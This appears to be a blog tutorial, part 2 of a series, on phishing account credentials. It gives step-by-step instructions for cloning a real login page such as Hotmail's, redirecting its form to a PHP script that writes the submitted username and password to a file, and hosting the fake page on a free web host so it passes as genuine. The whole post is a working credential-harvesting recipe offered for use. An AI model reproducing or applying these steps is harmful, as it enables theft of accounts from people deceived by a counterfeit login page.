Using Phishing to hack account Part 2

First off go to your login page and save it to a file, to do this in Firefox(the browser you should be using) simply go to File->Save Page as... then you can either save it as just the html document or you can download the whole page which will be more reliable when trying to avoid hosting issues.


Now you will have the page source code which we can edit to fit our needs later on.


Now you will have something along the lines of this:


Code:

form name="loginform" id="loginform" action="/login.php" method="post"

tr
Username:
td class="body"
input class="body" type="text" name="username" size="10" style="width:93px"

/tr

Password:

td class="body"
input class="body" type="password" name="pass" size="10" style="width:93px"
/td
/form


Now edit the normal login php script action to /check.php so it will post to that script when the login button is pushed.


Scripts may differ so be careful at how you edit them. Now we'll make the file that will actually log the username and pass.


Code:

php
$myFile = "userpass.txt";
$fh = fopen($myFile, 'w');
$space = " :: \n";
fwrite($fh, $space);
$password=$_POST['pass'];
fwrite($fh, $password);
$username=$_POST['username'];
fwrite($fh, $username);
fclose($fp);


Use approapriate php notations at start and end of code...(Greater than sign followed by questionmark at start and reverse at the end....sorry for not doing it here. Can mail me for more help).


Save that as check.php


So what this does is it opens the userpass.txt file and adds the posted data then closes it, this has to reference back to the script before where it says name="username" and name="pass" this may differ from script to script so make sure you edit them correctly!


Then find a php host to host your scripts, pictures etc... I suggest
http://www.100webspace.net

For those who don't have one available and those who can't afford one that costs money.


Now when you make that upload all the things you need:

1. login.php (your fake login)

2. check.php (your script to write to file)

3. Additional photos and files needed to make login like the real thing.


If you don't want to upload the additional files you must edit all the places in your login script that refer to "/" something to the real url so for an example: if /hotmailpic.bmp is referred to set it to http://www.hotmail.com/hotmailpic.bmp

0 comments:

Post a Comment